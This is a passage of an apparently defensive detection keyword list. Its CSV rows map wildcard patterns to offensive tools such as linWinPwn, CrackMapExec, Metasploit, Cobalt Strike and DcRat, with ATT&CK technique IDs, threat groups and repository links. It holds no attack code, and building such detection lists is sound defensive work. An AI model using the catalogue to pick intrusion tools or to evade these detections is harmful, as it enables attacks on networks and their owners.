TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - 
T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife 
for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cmpivot.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" +"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmVmbGVjdGl2ZQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*CN=PortSwigger*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*CN=ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*cnotin/SplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*Coalfire-Research*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Coalfire-Research/Slackor*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*Cobalt Strike external 
C2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*Cobalt Strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltclip.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cobaltclip.exe*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*cobaltstrike *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike*","offensive_tool_keyword","cobaltstrike","cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. 
these assessments benefit security operations and incident response.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike-*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*-cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike.*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*CobaltStrike.LJ!MTB*","signature_keyword","Antivirus Signature","windows defender antivirus signature for UAC bypass","N/A","N/A","N/A","N/A","C2","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*cobaltstrike.store*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 